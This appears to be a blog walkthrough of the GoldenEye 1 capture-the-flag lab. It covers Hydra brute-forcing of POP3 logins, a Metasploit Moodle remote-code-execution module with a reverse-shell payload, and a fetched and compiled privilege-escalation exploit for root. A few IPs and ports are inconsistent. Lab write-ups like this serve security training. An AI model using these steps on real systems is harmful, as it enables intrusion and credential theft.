Hello Everyone, In this blog i am going to post walkthrough of GoldenEye 1. This machine is for them who have basic Knowledge and hand’s on experience with penetration Testing.
you can download the machine here.
Let’s Begin !!
Target IP – 192.168.43.155
Attacker IP – 18.104.22.168
So, Let’s start with scanning
nmap -sC -sV -Pn -p- 192.168.43.155
Ok!! we can see there are 4 ports open.
Now, Let’s check the website running on port 80.
It says to Navigate to /sev-home/.
Ok, We need to Login.
So, i tried few default usernames and passwords but it didn’t work.
I thought of checking page source.
Ok, There is terminal.js Let’s open it.
We can there is HTML encoded password and two usernames.
Let’s decode the password.
We got the password .
Let’s try to login on /sev-home/
Username – boris
Password – InvincibleHack3r
we logged in!!
I read the information written on the page.
the last sentence says POP3 is running on non-default port.
Even scan result says there is POP3 running on port 55007.
Let’s Bruteforce on POP3 with the usernames boris and natalya using the tool Hydra.
hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f 192.168.43.155 -s 55007 pop3
hydra -l natalya -P /usr/share/wordlists/fasttrack.txt -f 192.168.43.155 -s 55007 pop3
We found passwords.
boris – secret1!
natalya – bird
Now, Let’s connect to pop3 using the credentials by nc.
nc 192.168.43.155 55007
There are 3 Messages Let’s see,
It’s a message from admin to boris.
It’s a message from natalya to boris, that natalya can break boris codes.
In 3rd message we can see access codes are kept in root directory. So, we can’t access from here.
Let’s move to natalya
nc 192.168.43.155 55007
There are 2 mesages, Let’s see
It’s a message to natalya, that she has to stop breaking boris codes.
Ok! we got some information here,
Before opening the domain we have to point server IP to severnaya-station.com in /etc/hosts
echo 192.168.43.155 severnaya-station.com >> /etc/hosts
Let’s check in the browser
Now, Let’s login with the credentials we got in natalya mail.
After logging in, I was exploring and found another user chat in messages.
if we read it it says,
My email username is “doak”.
Let’s bruteforce again with doak as the username on pop3 using hydra.
hydra -l doak -P /usr/share/wordlists/fasttrack.txt -f 192.168.43.155 -s 55007 pop3
Ok! we got the password “goat“.
Now, let’s connect to pop3 using nc.
nc 192.168.43.155 5500
So, we got the login credentials of doak.
We logged in as dr_doak.
I was checking every module to find any clue then there is module My private files there i found a text file “s3cret.txt“
I downloaded the file and checked if we can find anything,
So, it says something is located in /dir007key/for-007.jpg
So, i opened above URL in browser
It’s an image. So i downloaded it and checked,
Ok! we can see something encoded string, It’s a base64 encoded string
We got plain text string and we know it is admin’s password.
We logged in as ADMIN.
Now, we should get shell on our terminal.
I searched if we can upload a file to get the revere shell but didn’t find any.
After exploring, i found the the website name as “MOODLE” and found it’s version.
I checked if there is any exploit for Moodle 2.2.3 and i found there is Remote Code Execution vulnerability .
So, i started Metasploit Framework.
set password xWinter1995x!
set rhost severnaya-station.com
set targeturi /gnocertdir
set username admin
set payload cmd/unix/reverse
set lhost 192.168.43.139
set lport 4444
we got the shell.
Now we have to get root access,
So, i got the version details.
I checked for the exploit and found 1.
Let’s download it,
and let’s edit the code
By default it is gcc change it to cc as gcc isn’t working on shell we got.
Save it and start python http server.
python -m SimpleHTTPServer 8080
Now, let’s get the file into the shell we got,
cc exploit.c -o priv
Here, I got the ROOT access.